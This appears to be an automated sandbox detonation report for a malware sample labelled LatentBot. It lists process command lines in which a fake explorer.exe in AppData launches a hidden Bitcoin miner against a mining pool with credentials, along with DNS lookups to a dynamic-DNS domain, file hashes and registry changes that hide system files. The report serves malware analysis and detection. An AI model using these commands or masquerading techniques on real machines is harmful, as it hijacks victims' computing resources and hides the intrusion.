C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c C:\Users\Admin\AppData\Roaming\explorer.exe
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g yes -o http://pool.pool.bitclockers.com:8332/ -u donaldas -p donaladas
C:\Windows\SysWOW64\cmd.exe
cmd /c C:\Users\Admin\AppData\Roaming\winserv.exe -a 15 -t 1 -g no -o http://pool.bitclockers.com:8332/ -u v2 -p explorer.exe
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | g.bing.com | udp |
| US | 150.171.28.10:443 | g.bing.com | tcp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| NL | 173.194.69.94:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
| US | 8.8.8.8:53 | superwaffles.zapto.org | udp |
Files
C:\Users\Admin\AppData\Roaming\explorer.exe
| MD5 | c4ad493a6bfd212c4e1418ba605020af |
| SHA1 | 20272ac81bd1df68603924ae3b1fe4c2df034a29 |
| SHA256 | 492bd918e98e5802cf1ff5d3f0537567a7657477fff9cb5e7657448f64ead496 |
| SHA512 | 736487e85b4986284139599befb69a3483108c6199e6737524aafad9daa8614e67ab244859d71affacbcebba8e07af91fb2c4c10484f7988fa7dacd51897ccaf |
Analysis: behavioral2
Detonation Overview
Submitted
2025-04-20 05:30
Reported
2025-04-20 05:32
Platform
win11-20250410-en
Max time kernel
150s
Max time network
146s
Command Line
Signatures
LatentBot
Latentbot family
Modifies visiblity of hidden/system files in Explorer
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_c4ad493a6bfd212c4e1418ba605020af.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-3437575798-4173230203-4015467660-1000\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden = "0" | C:\Users\Admin\AppData\Roaming\explorer.exe | N/A |
